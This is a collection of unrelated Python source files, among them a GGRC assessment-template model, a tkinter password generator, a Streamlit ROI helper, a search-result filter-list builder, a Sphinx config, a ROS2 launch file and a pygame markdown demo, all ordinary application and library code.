"Regulations",
"Requirements",
"Risks",
"Standards",
"Threats",
)
_aliases = {
"status": {
"display_name": "State",
"mandatory": False,
"description": "Options are:\n{}".format('\n'.join(VALID_STATES))
},
"default_assignees": {
"display_name": "Default Assignees",
"mandatory": True,
"filter_by": "_nop_filter",
"description": _hint_verifier_assignees(
_DEFAULT_PEOPLE_LABELS_ACTUAL,
_DEFAULT_PEOPLE_LABELS_CONTROL,
_DEFAULT_PEOPLE_LABELS_RISK,
)
},
"default_verifier": {
"display_name": "Default Verifiers",
"mandatory": False,
"filter_by": "_nop_filter",
"description": _hint_verifier_assignees(
_DEFAULT_PEOPLE_LABELS_ACTUAL,
_DEFAULT_PEOPLE_LABELS_CONTROL,
_DEFAULT_PEOPLE_LABELS_RISK,
)
},
"procedure_description": {
"display_name": "Default Assessment Procedure",
"filter_by": "_nop_filter",
},
"test_plan_procedure": {
"display_name": "Use Control Assessment Procedure",
"mandatory": False,
},
"template_object_type": {
"display_name": "Default Assessment Type",
"mandatory": True,
"description": "Allowed values are:\n{}".format(
'\n'.join(DEFAULT_ASSESSMENT_TYPE_OPTIONS)),
},
"archived": {
"display_name": "Archived",
"mandatory": False,
"ignore_on_update": True,
"view_only": True,
},
"template_custom_attributes": {
"display_name": "Custom Attributes",
"type": AttributeInfo.Type.SPECIAL_MAPPING,
"filter_by": "_nop_filter",
"description": (
"List of custom attributes for the assessment template\n"
"One attribute per line. fields are separated by commas ','\n\n"
"<attribute type>, <attribute name>, [<attribute value1>, "
"<attribute value2>, ...]\n\n"
"Valid attribute types: Text, Rich Text, Date, Checkbox, Person,"
"Multiselect, Dropdown.\n"
"attribute name: Any single line string without commas. Leading "
"and trailing spaces are ignored.\n"
"list of attribute values: Comma separated list, only used if "
"attribute type is 'Dropdown'. Prepend '(a)' if the value has a "
"mandatory attachment and/or (c) if the value requires a "
"mandatory comment.\n\n"
"Limitations: Dropdown values can not start with either '(a)' or"
"'(c)' and attribute names can not contain commas ','."
),
},
}
@classmethod
def eager_query(cls, **kwargs):
query = super(AssessmentTemplate, cls).eager_query(**kwargs)
return query.options(
orm.Load(cls).joinedload("audit").undefer_group("Audit_complete"),
orm.Load(cls).joinedload("audit").joinedload(
audit.Audit.issuetracker_issue
),
)
@classmethod
def indexed_query(cls):
query = super(AssessmentTemplate, cls).indexed_query()
return query.options(
orm.Load(cls).joinedload("audit").undefer_group("Audit_complete")
)
@classmethod
def _nop_filter(cls, _):
"""No operation filter.
    This is used for objects for which we cannot implement a normal SQL query
    filter. An example is the default_verifier field, which is a JSON string in
    the db, so we cannot run direct queries on JSON fields.
"""
return None
@classmethod
def generate_slug_prefix(cls):
return "TEMPLATE"
def _clone(self, target=None):
"""Clone Assessment Template.
Args:
target: Destination Audit object.
Returns:
Instance of assessment template copy.
"""
data = {
"title": self.title,
"audit": target,
"template_object_type": self.template_object_type,
"test_plan_procedure": self.test_plan_procedure,
"procedure_description": self.procedure_description,
"default_people": self.default_people,
"modified_by": login.get_current_user(),
"status": self.status,
}
assessment_template_copy = AssessmentTemplate(**data)
db.session.add(assessment_template_copy)
return assessment_template_copy
def clone(self, target):
"""Clone Assessment Template and related custom attributes."""
assessment_template_copy = self._clone(target)
rel = relationship.Relationship(
source=target,
destination=assessment_template_copy
)
db.session.add(rel)
db.session.flush()
# pylint: disable=not-an-iterable
for cad in self.custom_attribute_definitions:
# pylint: disable=protected-access
cad._clone(assessment_template_copy)
return (assessment_template_copy, rel)
@validates('default_people')
def validate_default_people(self, key, value):
"""Check that default people lists are not empty.
Check if the default_people contains both assignees and verifiers. The
values of those fields must be truthy, and if the value is a string it
must be a valid default people label. If the value is not a string, it
should be a list of valid user ids, but that is too expensive to test in
this validator.
"""
# pylint: disable=unused-argument
for mandatory in self._mandatory_default_people:
mandatory_value = value.get(mandatory)
if (not mandatory_value or
isinstance(mandatory_value, list) and
any(not isinstance(p_id, (int, long))
for p_id in mandatory_value) or
isinstance(mandatory_value, basestring) and
mandatory_value not in self.DEFAULT_PEOPLE_LABELS):
raise ValidationError(
'Invalid value for default_people.{field}. Expected a people '
'label in string or a list of int people ids, received {value}.'
.format(field=mandatory, value=mandatory_value),
)
return value
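  # Example of a value accepted by the validator above (illustrative only):
  #   {"assignees": "Auditors", "verifiers": [42, 64]}
  # i.e. either a label from DEFAULT_PEOPLE_LABELS or a list of integer user ids.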
@simple_property
def archived(self):
"""Fetch the archived boolean from Audit"""
if hasattr(self, 'context') and hasattr(self.context, 'related_object'):
return getattr(self.context.related_object, 'archived', False)
return False
def create_audit_relationship(audit_stub, obj):
"""Create audit to assessment template relationship"""
# pylint: disable=W0212
parent_audit = audit.Audit.query.get(audit_stub["id"])
if not permissions_for()._is_allowed_for(parent_audit, "update"):
raise Forbidden()
rel = relationship.Relationship(
source=parent_audit,
destination=obj,
context=parent_audit.context)
db.session.add(rel)
@signals.Restful.model_posted.connect_via(AssessmentTemplate)
def handle_assessment_template(sender, obj=None, src=None, service=None):
# pylint: disable=unused-argument
"""Handle Assessment Template POST
If "audit" is set on POST, create relationship with Assessment template.
"""
if "audit" in src:
create_audit_relationship(src["audit"], obj)
|
py | 7dfcecdd6b1d909d159ecd059d519a3cb47bdddd | # coding=utf-8
# =============================================================================
# Website Finder
# =============================================================================
#
# A function returning the homepage of the website of a media outlet
#
import re
import json
import csv
from tqdm import tqdm
dic_homepage = {"La Voix du Nord": "www.lavoixdunord.fr",
"Le Figaro": "www.lefigaro.fr",
"La Montagne": "www.lamontagne.fr",
"Les Echos": "www.lesechos.fr",
"Le Courrier de l'Ouest": "www.ouest-france.fr",
"La Dépêche du Midi": "www.ladepeche.fr",
"Le Télégramme": "www.letelegramme.fr",
"Le Figaro Magazine": "https:/www.lefigaro.fr/lefigaromagazine",
"La Nouvelle République du Centre Ouest": "www.lanouvellerepublique.fr",
"Les Echos Business": "business.lesechos.fr",
"Sud Ouest": "www.sudouest.fr",
"Le Républicain Lorrain": "www.republicain-lorrain.fr",
"Les Echos Executives": "business.lesechos.fr",
"M, le magazine du Monde": "www.lemonde.fr/m-le-mag",
"La Croix": "www.la-croix.com",
"Les Echos Business.fr": "business.lesechos.fr",
"Capitalfinance.fr": "capitalfinance.lesechos.fr",
"Le Cercle Les Echos": "inurl:lesechos.fr/idees-debats/cercle",
"Capital Finance": "capitalfinance.lesechos.fr",
"Les Echos Week-End": "weekend.lesechos.fr",
"Le Progrès": "www.leprogres.fr",
"Midi Libre": "www.midilibre.fr/actu",
"Les Echos.fr": "www.lesechos.fr/",
"La Provence": "www.laprovence.com",
"La Nouvelle République Dimanche": "www.lanouvellerepublique.fr",
"Ouest France": "www.ouest-france.fr",
"L'Est Républicain": "www.estrepublicain.fr",
"Le Figaro Premium": "plus.lefigaro.fr/tag/figaro-premium",
"Enjeux Les Echos": "www.lesechos.fr"
}
# site:domain.com/path ("article title 1" OR "article title 2")
filepath = "factiva_fr_final.csv"
# filepath = "small_extract.csv"
media = set()
csv_HP = []
with open('article_with_AN_FR.csv', 'w', newline='', encoding="utf-8") as new_csv:
with open(filepath, encoding="utf-8") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
csv_writer = csv.writer(new_csv, delimiter=",")
first_row = ["title", "date", "media", "homepage", "AN"]
csv_writer.writerow(first_row)
next(csv_reader) #let the first line
for line in tqdm(csv_reader, total=770967):
try:
newline = []
AN = line[15].split(" ")[1]
newline.extend([line[3], line[8], line[25], dic_homepage[line[25]], AN])
csv_writer.writerow(newline)
except:
print("could not find",line[25],"in the dictionnary")
print(csv_writer)
|
py | 7dfced640e013f0455860f5f365970ead6f25578 | import _tkinter
from string import punctuation, ascii_letters, digits
import random
import tkinter as tk
from tkinter import messagebox
root=tk.Tk()
def create_passw(length):
try:
length=int(length)
all=punctuation+ascii_letters+digits
secure_random=random.SystemRandom()
password="".join(secure_random.choice(all) for i in range(length))
e2.insert (10, password)
except ValueError:
e2.insert(10, "Enter Numeric Value !")
def clear():
e1.delete(0,tk.END)
e2.delete(0,tk.END)
def exit():
ex = messagebox.askyesno ("Password Generator", "Confirm if you want to exit")
if ex > 0:
root.quit ()
return
root.geometry('600x350+0+0')
root.configure(bg='violet')
try:
photo = tk.PhotoImage (file="key.ico")
root.iconphoto (False, photo)
except _tkinter.TclError:
pass
size=tk.StringVar()
L1=tk.Label(root,text="PASSWORD GENERATOR",font=('arial',20,'bold','underline'),bg='violet')
L1.grid(row=0, column=0)
L2=tk.Label(root,text="Enter the Length of intended password:",font=('lucida handwriting',10),bg='violet')
L2.grid(row=3, column=0)
e1=tk.Entry(root,text=size)
e1.grid(row=3, column=1)
b1=tk.Button(root,text="PASSWORD =",command=lambda:create_passw(e1.get()))
b1.grid(row=4, column=0,padx=10,pady=1)
e2=tk.Entry(root)
e2.grid(row=4, column=1)
b2=tk.Button(root,text="CLEAR",command=lambda:clear())
b2.grid(row=5, column=0,padx=10,pady=10)
b3=tk.Button(root,text="EXIT",command=lambda:exit())
b3.grid(row=5, column=1,padx=10,pady=10)
root.mainloop()
|
py | 7dfced6825ba436851eda679d4ad59407172e202 | import streamlit as st
from PIL import Image, ImageDraw
import numpy as np
import io
from typing import Tuple
DEMO_IMAGE = "test-images/smart_meter.jpg"
RED = (255, 0, 0) # For objects within the ROI
DEFAULT_ROI_Y_MIN = 0.0
DEFAULT_ROI_Y_MAX = 1.0
DEFAULT_ROI_X_MIN = 0.0
DEFAULT_ROI_X_MAX = 1.0
st.sidebar.title("ROI")
ROI_X_MIN = st.sidebar.slider("x_min", 0.0, 1.0, DEFAULT_ROI_X_MIN)
ROI_Y_MIN = st.sidebar.slider("y_min", 0.0, 1.0, DEFAULT_ROI_Y_MIN)
ROI_X_MAX = st.sidebar.slider("x_max", 0.0, 1.0, DEFAULT_ROI_X_MAX)
ROI_Y_MAX = st.sidebar.slider("y_max", 0.0, 1.0, DEFAULT_ROI_Y_MAX)
ROI_TUPLE = (
ROI_Y_MIN,
ROI_X_MIN,
ROI_Y_MAX,
ROI_X_MAX,
)
def draw_box(
draw: ImageDraw,
box: Tuple[float, float, float, float],
img_width: int,
img_height: int,
text: str = "",
color: Tuple[int, int, int] = (255, 255, 0),
) -> None:
"""
    Draw a bounding box on an image.
The bounding box is defined by the tuple (y_min, x_min, y_max, x_max)
where the coordinates are floats in the range [0.0, 1.0] and
relative to the width and height of the image.
For example, if an image is 100 x 200 pixels (height x width) and the bounding
box is `(0.1, 0.2, 0.5, 0.9)`, the upper-left and bottom-right coordinates of
the bounding box will be `(40, 10)` to `(180, 50)` (in (x,y) coordinates).
"""
line_width = 10
y_min, x_min, y_max, x_max = box
(left, right, top, bottom) = (
x_min * img_width,
x_max * img_width,
y_min * img_height,
y_max * img_height,
)
draw.line(
[(left, top), (left, bottom), (right, bottom), (right, top), (left, top)],
width=line_width,
fill=color,
)
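# Minimal usage sketch (illustrative; the blank image below is an assumption):
#   img = Image.new("RGB", (200, 100))
#   draw_box(ImageDraw.Draw(img), (0.1, 0.2, 0.5, 0.9), img.width, img.height, color=RED)
# which draws the rectangle with corners (40, 10) and (180, 50), as in the docstring.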
st.title("Integration config helper app")
st.text("This app is to help determine the ROI config for your image processing integration")
st.text("Upload an image from your camera and adjust the sliders to outline the text you wish to capture")
img_file_buffer = st.file_uploader("Upload an image", type=["png", "jpg", "jpeg"])
if img_file_buffer is not None:
pil_image = Image.open(img_file_buffer)
else:
pil_image = Image.open(DEMO_IMAGE)
draw = ImageDraw.Draw(pil_image)
draw_box(
draw,
ROI_TUPLE,
pil_image.width,
pil_image.height,
color=RED,
)
st.text('Top left is (x=0, y=0), bottom left is (x=0, y=1), bottom right is (x=1, y=1)')
st.image(
pil_image, use_column_width=True,
)
config_yaml = f"""
roi_x_min: {ROI_X_MIN} \n
roi_x_max: {ROI_X_MAX} \n
roi_y_min: {ROI_Y_MIN} \n
roi_y_max: {ROI_Y_MAX} \n
"""
st.write('The roi values to enter in your integration config are:')
st.markdown(config_yaml, unsafe_allow_html=True) |
py | 7dfcef427f2aefeaf931cee2ff87efc936db4537 | from django.urls import path
from . import views
urlpatterns = [
# API
path('', views.retrieve_all_public_posts_on_local_server, name='post_index'),
path('<str:post_id>/', views.retrieve_single_post_with_id, name='post'),
path('<str:post_id>/comments/', views.comments_retrieval_and_creation_to_post_id, name="get_or_add_comment"),
#Internal use only
path("fetch_public_posts", views.fetch_public_posts_from_nodes),
path("proxy_image/<path:image_url>", views.proxy_foreign_server_image, name='proxy_image')
] |
py | 7dfcefb5bedfa4e6ff971a03eee0ea2b6cdb8759 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ....testing import assert_equal
from ..surface import MergeModels
def test_MergeModels_inputs():
input_map = dict(Model1=dict(argstr='%s',
position=-3,
),
Model2=dict(argstr='%s',
position=-2,
),
ModelOutput=dict(argstr='%s',
hash_files=False,
position=-1,
),
args=dict(argstr='%s',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
terminal_output=dict(nohash=True,
),
)
inputs = MergeModels.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_MergeModels_outputs():
output_map = dict(ModelOutput=dict(position=-1,
),
)
outputs = MergeModels.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
py | 7dfceffa99fee0d71c65e04b36df493ce2c79d8f | from glob import glob
from pathlib import Path
LINE_SEP = "\n"
def to_css_attr(url):
return url.replace("*://", "").replace("*.", ".").replace("/*", "")
def to_google(url):
return f'google.*##.g:has(a[href*="{to_css_attr(url)}"])'
def to_duckduckgo(url):
return f'duckduckgo.*##.results > div:has(a[href*="{to_css_attr(url)}"])'
def to_brave(url):
return f'search.brave.com###results > div:has(a[href*="{to_css_attr(url)}"])'
def to_startpage(url):
return f'startpage.com##.w-gl__result:has(a[href*="{to_css_attr(url)}"])'
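# Example transformation (illustrative): for a source line "*://*.example.com/*"
#   to_css_attr   -> ".example.com"
#   to_google     -> 'google.*##.g:has(a[href*=".example.com"])'
#   to_duckduckgo -> 'duckduckgo.*##.results > div:has(a[href*=".example.com"])'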
def main():
root_path = Path(__file__).parent.joinpath("../")
dist_path = root_path.joinpath("dist")
tmp_txt = dist_path.joinpath("tmp.txt")
g_all = dist_path.joinpath("google", "all.txt")
d_all = dist_path.joinpath("duckduckgo", "all.txt")
gd_all = dist_path.joinpath("google_duckduckgo", "all.txt")
b_all = dist_path.joinpath("brave", "all.txt")
sp_all = dist_path.joinpath("startpage", "all.txt")
for f in [g_all, d_all, gd_all, b_all, sp_all]:
f.parent.mkdir(parents=True, exist_ok=True)
with g_all.open("w") as g_all, \
d_all.open("w") as d_all, \
gd_all.open("w") as gd_all, \
b_all.open("w") as b_all, \
sp_all.open("w") as sp_all:
for file in root_path.joinpath("data").glob("*.txt"):
filename = file.name.split(".")[0]
# Sort and find duplicates
with file.open("r") as i, tmp_txt.open("w") as tmp:
already_in = set()
for line in i:
if line.startswith("!") or not line.strip():
tmp.write(line)
continue
url = line.strip()
if url in already_in:
print(f"Find duplicate: {url}. Skip!")
continue
else:
already_in.add(url)
tmp.write(line)
tmp_txt.replace(file)
with dist_path.joinpath("google", f"{filename}.txt").open("w") as g, \
dist_path.joinpath("duckduckgo", f"{filename}.txt").open("w") as d, \
dist_path.joinpath("google_duckduckgo", f"{filename}.txt").open("w") as gd, \
dist_path.joinpath("brave", f"{filename}.txt").open("w") as b, \
dist_path.joinpath("startpage", f"{filename}.txt").open("w") as sp, \
file.open("r") as i:
for line in i:
if line.startswith("!") or not line.strip():
continue
url = line.strip()
for f in [
g, g_all,
d, d_all,
gd, gd_all,
b, b_all,
sp, sp_all
]:
f.write(url + LINE_SEP)
url_google = to_google(url)
url_duckduckgo = to_duckduckgo(url)
url_brave = to_brave(url)
url_sp = to_startpage(url)
for f in [
g, g_all,
gd, gd_all
]:
f.write(url_google + LINE_SEP)
for f in [
d, d_all,
gd, gd_all
]:
f.write(url_duckduckgo + LINE_SEP)
for f in [
b, b_all
]:
f.write(url_brave + LINE_SEP)
for f in [
sp, sp_all
]:
f.write(url_sp + LINE_SEP)
if __name__ == "__main__":
main() |
py | 7dfcf02074e61c87bae35f30119dc90806eff293 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import json
import os
import sys
from datetime import date
from os import path
def read(filename):
here = path.dirname(path.abspath(__file__))
with open(path.join(here, filename)) as fd:
return fd.read()
def find_version(filename):
"""
Find package version in file.
"""
import re
content = read(filename)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", content, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
# print('current path', path.abspath('.'))
sys.path.insert(0, path.abspath("../.."))
# print(sys.path)
# -- Project information -----------------------------------------------------
project = "CogDL"
years = "2019-{}".format(date.today().year)
author = "CogDL Team, KEG"
copyright = "{}, {}".format(years, author)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
__version__ = find_version("../../cogdl/__init__.py")
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autosummary",
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
"recommonmark",
"sphinx_markdown_tables",
]
# generate autosummary pages
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "CogDLdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "CogDL.tex", "CogDL Documentation", "KEG", "manual")]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "cogdl", "CogDL Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"CogDL",
"CogDL Documentation",
author,
"CogDL",
"One line description of project.",
"Miscellaneous",
)
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {"https://docs.python.org/": None}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
|
py | 7dfcf223d9941cc09c5cff19fb4f7679c74498ab | import os
import yaml
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
# load crazyflies
crazyflies_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyflies.yaml')
with open(crazyflies_yaml, 'r') as ymlfile:
crazyflies = yaml.safe_load(ymlfile)
# load crazyflie_types
crazyflies_types_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyflie_types.yaml')
with open(crazyflies_types_yaml, 'r') as ymlfile:
crazyflie_types = yaml.safe_load(ymlfile)
# construct motion_capture_configuration
motion_capture_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'motion_capture.yaml')
with open(motion_capture_yaml, 'r') as ymlfile:
motion_capture = yaml.safe_load(ymlfile)
motion_capture_params = motion_capture["/motion_capture_tracking"]["ros__parameters"]
motion_capture_params["rigid_bodies"] = dict()
for key, value in crazyflies.items():
type = crazyflie_types[value["type"]]
motion_capture_params["rigid_bodies"][key] = {
"initial_position": value["initial_position"],
"marker": type["marker"],
"dynamics": type["dynamics"],
}
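    # Illustrative result of the loop above (the yaml values are assumptions):
    # a crazyflies.yaml entry such as
    #   cf1: {initial_position: [0.0, 0.0, 0.0], type: default}
    # becomes
    #   motion_capture_params["rigid_bodies"]["cf1"] ==
    #       {"initial_position": [0.0, 0.0, 0.0], "marker": ..., "dynamics": ...}
    # with marker/dynamics looked up from crazyflie_types.yaml.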
# construct crazyswarm2_server configuration
server_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyswarm2_server.yaml')
with open(server_yaml, 'r') as ymlfile:
server_params = yaml.safe_load(ymlfile)
server_params = server_params["/crazyswarm2_server"]["ros__parameters"]
server_params["crazyflies"] = crazyflies
server_params["crazyflie_types"] = crazyflie_types
# teleop params
teleop_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'teleop.yaml')
return LaunchDescription([
Node(
package='motion_capture_tracking',
executable='motion_capture_tracking_node',
name='motion_capture_tracking',
output='screen',
parameters=[motion_capture_params]
),
Node(
package='crazyswarm2',
executable='teleop',
name='teleop',
# remappings=[
# ('takeoff', 'cf3/takeoff'),
# ('land', 'cf3/land'),
# ('cmd_vel', 'cf3/cmd_vel')
# ],
parameters=[teleop_yaml]
),
Node(
package='joy',
executable='joy_node',
name='joy_node',
),
Node(
package='crazyswarm2',
executable='crazyswarm2_server',
name='crazyswarm2_server',
output='screen',
parameters=[server_params]
),
])
|
py | 7dfcf2296cdb8af5d443a2317dbadfb77a876738 | import time
from matplotlib.lines import Line2D
import numpy as np
from vis.ScatterVisualizer import ScatterVisualizer
class Path2DVis(ScatterVisualizer):
class __Path2DVis(ScatterVisualizer):
"""
scatter-plot lines for shortes path-visualisation
"""
def __init__(self, xymin=-50,xymax=1100,
num_runs=1, offset=50,interactive=True, sleep_interval=0):
"""
:param xymin:
            :param xymax: -> this is rubbish
:param num_runs:
:param offset:
:param interactive:
:param sleep_interval:
"""
super().__init__(interactive=interactive, xlim=0,
ylim=0, offset=offset, log_scale=False,
sexify=False)
self.set_yx_lim([xymin, xymax], [xymin, xymax])
self.num_runs = num_runs
self.sleep_interval = sleep_interval
self.my_plot.set_edgecolor('white')
def set_point_size(self, point_size=12.5):
"""
:param point_size:
:return:
"""
self.plot.set_sizes([point_size] * len(self.target_array))
def plot_path(self, x=[], y=[]):
"""
:param x:
:param y:
:return:
"""
self.ax.add_line(Line2D(x, y))
self.set_yx_lim([np.min(x) - self.offset, np.max(x) + self.offset],
[np.min(y) - self.offset, np.max(y) + self.offset])
# plt.savefig("/home/tobias/Bilder/tsp/path"+str(iteration)+".png")
self.fig.canvas.draw()
time.sleep(self.sleep_interval)
while True:
                # a bit ugly.
try:
self.ax.lines[0].remove()
except IndexError:
break
instance = None
def __init__(self, xymin=-50, xymax=1100,
num_runs=1, offset=50, interactive=True, sleep_interval=0):
if not Path2DVis.instance:
Path2DVis.instance = Path2DVis.__Path2DVis(xymin,xymax,
num_runs, offset, interactive, sleep_interval)
def __getattr__(self, name):
return getattr(self.instance, name) |
py | 7dfcf32e60d5920d589951da37307e798f0735f0 | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3725
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class TransactionPrice(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'price': 'float',
'type': 'str'
}
attribute_map = {
'price': 'price',
'type': 'type'
}
required_map = {
'price': 'optional',
'type': 'optional'
}
def __init__(self, price=None, type=None, local_vars_configuration=None): # noqa: E501
"""TransactionPrice - a model defined in OpenAPI"
:param price:
:type price: float
:param type: The available values are: Price, Yield, Spread
:type type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._price = None
self._type = None
self.discriminator = None
if price is not None:
self.price = price
if type is not None:
self.type = type
@property
def price(self):
"""Gets the price of this TransactionPrice. # noqa: E501
:return: The price of this TransactionPrice. # noqa: E501
:rtype: float
"""
return self._price
@price.setter
def price(self, price):
"""Sets the price of this TransactionPrice.
:param price: The price of this TransactionPrice. # noqa: E501
:type price: float
"""
self._price = price
@property
def type(self):
"""Gets the type of this TransactionPrice. # noqa: E501
The available values are: Price, Yield, Spread # noqa: E501
:return: The type of this TransactionPrice. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this TransactionPrice.
The available values are: Price, Yield, Spread # noqa: E501
:param type: The type of this TransactionPrice. # noqa: E501
:type type: str
"""
allowed_values = ["Price", "Yield", "Spread"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
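    # Illustrative round trip (assumption, not part of the generated SDK code):
    #   tp = TransactionPrice(price=101.25, type="Price")
    #   tp.to_dict()  ->  {"price": 101.25, "type": "Price"}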
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TransactionPrice):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TransactionPrice):
return True
return self.to_dict() != other.to_dict()
|
py | 7dfcf4ec628a67da23e83dd71ddaa0e97e3f457b | # -*- coding: utf-8 -*-
# Copyright (c) 2018, VHRS and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCandidateRegistration(unittest.TestCase):
pass
|
py | 7dfcf4ed98b0775474e898424b8de8c211ec99d2 | import pygame
from pygame_markdown.PygameMarkdown import MarkdownRenderer
# minimal pygame setup
pygame.init()
screenHeight = 900
screenWidth = 600
screen = pygame.display.set_mode((screenWidth, screenHeight))
pygame.display.set_caption("Pygame")
pygame.display.get_surface().fill((200, 200, 200)) # background coloring
# parameters
surface = pygame.display.get_surface() # get existing pygame window/screen
offset_X = 50 # offset from the left border of the pygame window
offset_Y = 20 # offset from the top border of the pygame window
textAreaHeight = 800
textAreaWidth = 500
mdfile_path = "README_test.md"
md = MarkdownRenderer()
md.set_markdown(mdfile_path)
md.set_area(surface, offset_X, offset_Y, textAreaWidth, textAreaHeight)
# OPTIONAL
#md.set_scroll_step(25)
#md.set_line_gaps(8, 35)
#md.set_font_sizes(28, 24, 20, 16, 16, 16)
md.set_font('Arial', 'CourierNew')
md.set_color_background(204, 204, 204)
